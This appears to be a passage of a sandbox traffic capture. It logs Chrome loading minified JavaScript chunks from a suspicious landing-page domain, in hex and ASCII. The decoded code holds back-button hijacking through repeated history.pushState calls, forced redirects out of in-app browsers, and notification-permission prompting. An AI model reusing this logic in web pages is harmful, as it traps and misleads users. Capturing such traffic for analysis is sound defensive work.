                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 73 65 2e 64 61 74 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 3b 28 30 2c 73 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 26 26 52 26 26 28 51 26 26 21 55 26 26 28 28 30 2c 64 2e 63 4d 29 28 22 69 6e 41 70 70 3a 20 55 73 65 72 20 64 69 64 20 6e 6f 74 20 67 6f 20 74 6f 20 63 68 72 6f 6d 65 2e 20 52 65 6d 6f 76 69 6e 67 20 6f 76 65 72 6c 61 79 22 29 2c 5a 28 21 31 29 2c 6a 28 21 31 29 29 2c 51 7c 7c 28 28 30 2c 64 2e 63 4d 29 28 22 69 6e 41 70 70 3a 20 55 73 65 72 20 68 61 73 20 67 6f 6e 65 20 74 6f 20 63 68 72 6f 6d 65 2e 20 52 65 73 74 6f 72 69 6e 67 20 6f 76 65 72 6c 61 79 22 29 2c 5a 28 21 30 29 2c 6a 28 21 30 29 29 29 7d 29 2c 5b 52 2c 51 2c 63 2c 55 5d 29 3b 76 61 72 20 6c 65 3d 7b 6d 69 75 69 3a 7b 69 73 45 6e 61
                                                                                                          Data Ascii: se.data.platformVersion;(0,s.useEffect)((function(){c&&R&&(Q&&!U&&((0,d.cM)("inApp: User did not go to chrome. Removing overlay"),Z(!1),j(!1)),Q||((0,d.cM)("inApp: User has gone to chrome. Restoring overlay"),Z(!0),j(!0)))}),[R,Q,c,U]);var le={miui:{isEna
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 73 75 62 64 6f 6d 61 69 6e 3a 20 22 2c 6f 29 2c 58 28 21 30 29 3b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 28 30 2c 76 2e 64 33 29 28 29 2c 74 3d 28 30 2c 76 2e 71 35 29 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2c 6e 29 2c 72 3d 22 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2c 22 2f 2f 22 29 2e 63 6f 6e 63 61 74 28 74 29 2e 63 6f 6e 63 61 74 28 4d 2c 22 3f 22 29 2e 63 6f 6e 63 61 74 28 65 29 3b 72 65 74 75 72 6e 28 30 2c 64 2e 63 4d 29 28 22 5b 49 6e 41 70 70 4f 76 65 72 6c 61 79 5d 3a 20 63 72 65 61 74 65 4c 69 6e 6b 54 6f 4e 65 78 74 4c 61 6e 64 69 6e 67 22 2c 22 72 65 64 69 72 65 63 74 20 73 65 74 54 69 6d 65 6f 75 74 20 74 6f 3a 20
                                                                                                          Data Ascii: subdomain: ",o),X(!0);var a=function(e){var n=(0,v.d3)(),t=(0,v.q5)(window.location.hostname,n),r="".concat(window.location.protocol,"//").concat(t).concat(M,"?").concat(e);return(0,d.cM)("[InAppOverlay]: createLinkToNextLanding","redirect setTimeout to:
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 72 20 6e 3d 62 65 28 29 3b 75 2e 56 38 26 26 21 4b 26 26 28 28 30 2c 64 2e 63 4d 29 28 22 5b 49 6e 41 70 70 4f 76 65 72 6c 61 79 5d 3a 20 68 61 6e 64 6c 65 49 6e 41 70 70 2c 22 2c 22 69 73 52 65 64 69 72 65 63 74 42 79 43 6f 75 6e 74 65 72 73 49 6e 41 70 70 20 74 72 75 65 22 2c 22 72 65 64 69 72 65 63 74 20 74 6f 3a 22 2c 6e 29 2c 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 6e 29 7d 65 6c 73 65 20 69 66 28 52 7c 7c 4b 29 76 65 28 29 3b 65 6c 73 65 7b 76 61 72 20 74 3d 62 65 28 29 3b 75 2e 56 38 26 26 28 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 74 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 70 65 29 7d 7d 3b
                                                                                                          Data Ascii: r n=be();u.V8&&!K&&((0,d.cM)("[InAppOverlay]: handleInApp,","isRedirectByCountersInApp true","redirect to:",n),document.location.href=n)}else if(R||K)ve();else{var t=be();u.V8&&(document.location.href=t),document.addEventListener("visibilitychange",pe)}};
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 2e 7a 49 6e 64 65 78 3d 22 31 30 30 30 22 2c 6e 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6e 2e 73 74 79 6c 65 2e 6d 61 78 48 65 69 67 68 74 3d 22 33 30 25 22 2c 6e 2e 73 74 79 6c 65 2e 63 6f 6c 6f 72 3d 22 62 6c 61 63 6b 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 29 2c 21 41 72 72 61 79 2e 66 72 6f 6d 28 6e 2e 63 68 69 6c 64 72 65 6e 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 7d 29 29 2e 69 6e 63 6c 75 64 65 73 28 65 29 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 2c 6e 2e 61 70 70 65 6e 64 43
                                                                                                          Data Ascii: .zIndex="1000",n.style.overflowY="auto",n.style.maxHeight="30%",n.style.color="black",document.body.appendChild(n)),!Array.from(n.children).map((function(e){return e.textContent})).includes(e)){var t=document.createElement("div");t.textContent=e,n.appendC
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 65 6c 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 5b 34 2c 74 2e 65 28 39 30 34 34 38 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 39 30 34 34 38 29 29 5d 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 6e 3d 72 2e 73 65 6e 74 28 29 2e 42 52 4f 57 53 45 52 53 5f 46 55 4c 4c 2c 65 2e 6c 69 73 74 4f 66 57 65 62 76 69 65 77 42 72 6f 77 73 65 72 73 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 29 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 22 77 76 5f 22 29 7d 29 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 75 2e 5a 29 28 28 30 2c 73 2e 5a 29 28 7b 7d 2c 65 29 2c 28 30 2c 61 2e 5a 29 28 7b 7d 2c 74 2c 6e 5b 74 5d 29 29 7d 29 2c 7b
                                                                                                          Data Ascii: el){case 0:return[4,t.e(90448).then(t.bind(t,90448))];case 1:return n=r.sent().BROWSERS_FULL,e.listOfWebviewBrowsers=Object.keys(n).filter((function(e){return e.startsWith("wv_")})).reduce((function(e,t){return(0,u.Z)((0,s.Z)({},e),(0,a.Z)({},t,n[t]))}),{
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 69 73 45 6e 61 62 6c 65 64 26 26 61 2e 70 75 73 68 28 6e 2e 74 79 70 65 29 7d 29 29 2c 74 68 69 73 2e 75 73 65 46 75 6c 6c 4c 69 73 74 4f 66 42 72 6f 77 73 65 72 73 26 26 74 68 69 73 2e 6c 69 73 74 4f 66 57 65 62 76 69 65 77 42 72 6f 77 73 65 72 73 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 68 69 73 2e 6c 69 73 74 4f 66 57 65 62 76 69 65 77 42 72 6f 77 73 65 72 73 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 74 3d 28 30 2c 63 2e 5a 29 28 65 2c 32 29 5b 31 5d 3b 28 6e 3d 61 29 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 28 30 2c 6c 2e 5a 29 28 74 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 29 29 29 7d 29 29 3b 76 61 72 20 66 3d 6e 65
                                                                                                          Data Ascii: isEnabled&&a.push(n.type)})),this.useFullListOfBrowsers&&this.listOfWebviewBrowsers&&Object.entries(this.listOfWebviewBrowsers).forEach((function(e){var n,t=(0,c.Z)(e,2)[1];(n=a).push.apply(n,(0,l.Z)(t.map((function(e){return e.toString()}))))}));var f=ne
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6c 65 5f 73 61 66 61 72 69 5f 75 69 5f 77 6b 77 65 62 76 69 65 77 3d 22 6d 6f 62 69 6c 65 5f 73 61 66 61 72 69 5f 75 69 5f 77 6b 77 65 62 76 69 65 77 22 2c 65 2e 71 71 5f 62 72 6f 77 73 65 72 5f 6d 6f 62 69 6c 65 3d 22 71 71 5f 62 72 6f 77 73 65 72 5f 6d 6f 62 69 6c 65 22 7d 28 69 7c 7c 28 69 3d 7b 7d 29 29 7d 2c 32 38 39 33 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 4b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 72 3d 74 28 31 32 31 33 39 29 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 28 30 2c 72 2e 75 73 65 53 74 61 74 65 29 28 21 30 29 2c 6e 3d 65 5b 30 5d 2c 74 3d 65 5b 31 5d 3b 72 65 74 75 72 6e 28 30 2c 72 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69
                                                                                                          Data Ascii: le_safari_ui_wkwebview="mobile_safari_ui_wkwebview",e.qq_browser_mobile="qq_browser_mobile"}(i||(i={}))},28939:function(e,n,t){t.d(n,{K:function(){return i}});var r=t(12139),i=function(){var e=(0,r.useState)(!0),n=e[0],t=e[1];return(0,r.useEffect)((functi


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          57192.168.2.450099104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC553OUTGET /_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-1891"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4167fc747ce2-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 31 38 39 31 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 38 32 34 39 5d 2c 7b 34 33 36 30 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 29 7b 69 2e 64 28 65 2c 7b 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 74 2c 6f 3d 69 28 32 39 35 30 35 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 6e 75 6c 6c 21 3d 3d 28 74 3d 28 30 2c 6f 2e 65 6a 29 28 6e 29 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 22 30 22 2c 31 30 29 7d 7d 2c 35 30 36 35 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 69 29 7b 69
                                                                                                          Data Ascii: 1891"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[68249],{43601:function(n,e,i){i.d(e,{N:function(){return r}});var t,o=i(29505),r=function(n){return parseInt(null!==(t=(0,o.ej)(n))&&void 0!==t?t:"0",10)}},50656:function(n,e,i){i
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 74 75 72 6e 20 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6e 29 7d 7d 29 2c 5b 5d 29 3b 72 65 74 75 72 6e 7b 69 6e 69 74 42 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3b 69 66 28 62 2e 62 61 63 6b 2e 69 73 45 6e 61 62 6c 65 64 29 69 66 28 65 3e 31 32 26 26 4e 29 28 30 2c 61 2e 79 4e 29 28 22 69 6e 69 74 42 61 63 6b 3a 20 54 6f 6f 20 6d 75 63 68 20 70 75 73 68 53 74 61 74 65 54 6f 48 69 73 74 6f 72 79 22 29 3b 65 6c 73 65 7b 76 61 72 20 6c 2c 64 2c 66 2c 55 2c 6b 3d 6e 75 6c 6c 21 3d 3d 28 6c 3d 62 2e 62 61 63 6b 2e 68 69 73 74 6f 72 79 54 69 6d 65 41 6d 6f 75 6e 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 3a 33 2c 5f 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 62 2e 62 61 63 6b 2e 7a 6f 6e 65 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f
                                                                                                          Data Ascii: turn clearInterval(n)}}),[]);return{initBack:function(n){var t;if(b.back.isEnabled)if(e>12&&N)(0,a.yN)("initBack: Too much pushStateToHistory");else{var l,d,f,U,k=null!==(l=b.back.historyTimeAmount)&&void 0!==l?l:3,_=null===(t=b.back.zones)||void 0===t?vo
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6f 6e 28 6e 2c 65 2c 69 29 7b 74 72 79 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 65 3b 74 2b 3d 31 29 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 70 75 73 68 53 74 61 74 65 28 6e 75 6c 6c 2c 22 50 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 22 2c 6e 29 2c 69 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 2b 31 7d 29 29 7d 63 61 74 63 68 28 6f 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 46 61 69 6c 65 64 20 74 6f 20 70 75 73 68 20 73 74 61 74 65 2c 20 65 72 72 6f 72 3a 22 2c 6f 29 7d 7d 28 22 2f 62 61 63 6b 3f 22 2e 63 6f 6e 63 61 74 28 54 29 2c 6b 2c 69 29 7d 65 6c 73 65 28 30 2c 61 2e 79 4e 29 28 22 5a 6f 6e 65 20 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 20 69 73 20 6e 6f 74 20 65 6e 61 62 6c 65 64 22 29 29 3b 65 6c 73 65 20 63 6f 6e
                                                                                                          Data Ascii: on(n,e,i){try{for(var t=0;t<e;t+=1)window.history.pushState(null,"Please wait...",n),i((function(n){return n+1}))}catch(o){console.error("Failed to push state, error:",o)}}("/back?".concat(T),k,i)}else(0,a.yN)("Zone ".concat(n," is not enabled"));else con
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 6f 29 7d 7d 65 6c 73 65 7b 76 61 72 20 61 3d 5b 22 74 6f 75 63 68 73 74 61 72 74 22 2c 22 63 6c 69 63 6b 22 5d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 68 61 6e 64 6c 65 41 63 74 69 76 69 74 79 22 29 2c 72 28 21 30 29 2c 61 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 75 2c 21 30 29 7d 29 29 7d 3b 61 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 6e 2c 75 2c 21 30
                                                                                                          Data Ascii: function(){return window.clearInterval(o)}}else{var a=["touchstart","click"],u=function(){console.log("handleActivity"),r(!0),a.forEach((function(n){return window.removeEventListener(n,u,!0)}))};a.forEach((function(n){return window.addEventListener(n,u,!0
                                                                                                          2025-01-06 11:09:22 UTC1317INData Raw: 69 6f 6e 28 6e 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 6e 2c 65 29 7d 29 29 29 5d 3a 5b 33 2c 32 5d 3b 63 61 73 65 20 31 3a 6e 2e 73 65 6e 74 28 29 2c 6e 2e 6c 61 62 65 6c 3d 32 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 65 2c 74 3d 50 7c 7c 42 7c 7c 4d 7c 7c 5a 2c 61 3d 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 71 2e 65 78 69 74 55 72 6c 73 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6c 65 6e 67 74 68 29 7c 7c 30 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 50 7c 7c 71 2e 6e 6f 6e 55 6e 69 71 75 65 2e 69 73 43 68 65 63 6b 65 64 29 69 66 28 21 42 7c 7c 71 2e 6e 6f 6e 55 6e 69 71 75 65 2e 69 73 43 68 65 63 6b 65 64 29 7b 69 66 28 77 29 7b 69 66 28 4d 29 72 65 74 75 72 6e 28 30 2c
                                                                                                          Data Ascii: ion(n){setTimeout(n,e)})))]:[3,2];case 1:n.sent(),n.label=2;case 2:return function(){var n,e,t=P||B||M||Z,a=(null===(n=q.exitUrls)||void 0===n?void 0:n.length)||0,u=function(){if(!P||q.nonUnique.isChecked)if(!B||q.nonUnique.isChecked){if(w){if(M)return(0,
                                                                                                          2025-01-06 11:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          58192.168.2.450104104.18.2.44438188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-06 11:09:22 UTC412OUTGET /_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js HTTP/1.1
                                                                                                          Host: wungoangeredsa.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2025-01-06 11:09:22 UTC496INHTTP/1.1 200 OK
                                                                                                          Date: Mon, 06 Jan 2025 11:09:22 GMT
                                                                                                          Content-Type: application/javascript
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Last-Modified: Sun, 05 Jan 2025 10:29:40 GMT
                                                                                                          Vary: Accept-Encoding
                                                                                                          ETag: W/"677a5f14-e2b6"
                                                                                                          Strict-Transport-Security: max-age=1
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 1055
                                                                                                          Expires: Mon, 06 Jan 2025 12:09:22 GMT
                                                                                                          Cache-Control: public, max-age=3600
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fdb4168dad77cee-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2025-01-06 11:09:22 UTC873INData Raw: 37 64 63 31 0d 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 34 39 36 34 5d 2c 7b 37 34 38 30 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 5b 6c 61 6e 64 69 6e 67 4e 61 6d 65 5d 2f 5b 63 6f 6e 66 69 67 49 64 5d 2f 5b 5b 2e 2e 2e 73 6c 75 67 5d 5d 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 28 31 39 39 31 36 29 7d 5d 29 7d 2c 31 39 39 31 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 72 28 65 29 2c 74 2e 64 28 65
                                                                                                          Data Ascii: 7dc1(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[14964],{74801:function(n,e,t){(window.__NEXT_P=window.__NEXT_P||[]).push(["/[landingName]/[configId]/[[...slug]]",function(){return t(19916)}])},19916:function(n,e,t){"use strict";t.r(e),t.d(e
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 28 30 2c 64 2e 50 54 29 28 29 2c 6c 2e 56 38 26 26 28 30 2c 70 2e 53 6a 29 28 7b 63 75 72 72 65 6e 74 54 61 62 55 72 6c 3a 6e 7d 29 7d 3b 72 65 74 75 72 6e 28 30 2c 73 2e 75 73 65 45 66 66 65 63 74 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 28 30 2c 64 2e 62 50 29 28 22 43 68 65 63 6b 50 65 72 6d 69 73 73 69 6f 6e 22 29 2c 22 4e 6f 74 69 66 69 63 61 74 69 6f 6e 22 69 6e 20 77 69 6e 64 6f 77 29 73 77 69 74 63 68 28 4e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 70 65 72 6d 69 73 73 69 6f 6e 29 7b 63 61 73 65 22 67 72 61 6e 74 65 64 22 3a 28 30 2c 64 2e 63 4d 29 28 22 5b 43 68 65 63 6b 50 65 72 6d 69 73 73 69 6f 6e 5d 3a 20 67 72 61 6e 74 65 64 22 29 2c 6f 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 65 6e 69 65 64 22 3a 28 30 2c 64 2e 63 4d 29 28 22 5b 43
                                                                                                          Data Ascii: (0,d.PT)(),l.V8&&(0,p.Sj)({currentTabUrl:n})};return(0,s.useEffect)((function(){if((0,d.bP)("CheckPermission"),"Notification"in window)switch(Notification.permission){case"granted":(0,d.cM)("[CheckPermission]: granted"),o();break;case"denied":(0,d.cM)("[C
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 7d 2c 73 73 72 3a 21 31 7d 29 2c 41 3d 72 28 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 28 36 31 31 35 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 31 31 35 29 29 7d 29 2c 7b 6c 6f 61 64 61 62 6c 65 47 65 6e 65 72 61 74 65 64 3a 7b 77 65 62 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 36 31 31 35 5d 7d 7d 2c 73 73 72 3a 21 31 7d 29 2c 5f 3d 72 28 29 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 65 28 36 36 30 33 37 29 2e 74 68 65 6e 28 74 2e 62 69 6e 64 28 74 2c 36 36 30 33 37 29 29 7d 29 2c 7b 6c 6f 61 64 61 62 6c 65 47 65 6e 65 72 61 74 65 64 3a 7b 77 65 62 70 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 36 36 30 33 37 5d 7d 7d 2c 73 73 72 3a 21 31 7d 29
                                                                                                          Data Ascii: },ssr:!1}),A=r()((function(){return t.e(6115).then(t.bind(t,6115))}),{loadableGenerated:{webpack:function(){return[6115]}},ssr:!1}),_=r()((function(){return t.e(66037).then(t.bind(t,66037))}),{loadableGenerated:{webpack:function(){return[66037]}},ssr:!1})
                                                                                                          2025-01-06 11:09:22 UTC1369INData Raw: 6e 75 6c 6c 21 3d 3d 48 26 26 76 6f 69 64 20 30 21 3d 3d 48 3f 48 3a 5b 5d 29 2c 74 6e 3d 65 6e 2e 69 6e 41 70 70 2c 6f 6e 3d 65 6e 2e 70 75 73 68 2c 61 6e 3d 65 6e 2e 76 69 67 6e 65 74 74 65 2c 72 6e 3d 65 6e 2e 72 65 76 65 72 73 65 2c 75 6e 3d 65 6e 2e 6e 6f 6e 55 6e 69 71 75 65 2c 73 6e 3d 65 6e 2e 6e 6f 6e 55 6e 69 71 75 65 54 65 65 6e 3b 28 30 2c 78 2e 75 29 28 29 3b 76 61 72 20 63 6e 2c 6c 6e 2c 64 6e 2c 66 6e 2c 70 6e 2c 76 6e 2c 6d 6e 2c 62 6e 2c 45 6e 2c 67 6e 3d 63 28 29 2e 69 73 49 6f 73 3b 72 65 74 75 72 6e 20 75 2e 6e 2e 70 72 65 76 69 65 77 3f 28 30 2c 69 2e 74 5a 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 67 7d 29 3a 28 30 2c 69 2e 42 58 29 28 69 2e 48 59 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 21 75 2e 6e 2e 72 64 26 26 28 30 2c 69 2e
                                                                                                          Data Ascii: null!==H&&void 0!==H?H:[]),tn=en.inApp,on=en.push,an=en.vignette,rn=en.reverse,un=en.nonUnique,sn=en.nonUniqueTeen;(0,x.u)();var cn,ln,dn,fn,pn,vn,mn,bn,En,gn=c().isIos;return u.n.preview?(0,i.tZ)(i.HY,{children:g}):(0,i.BX)(i.HY,{children:[!u.n.rd&&(0,i.
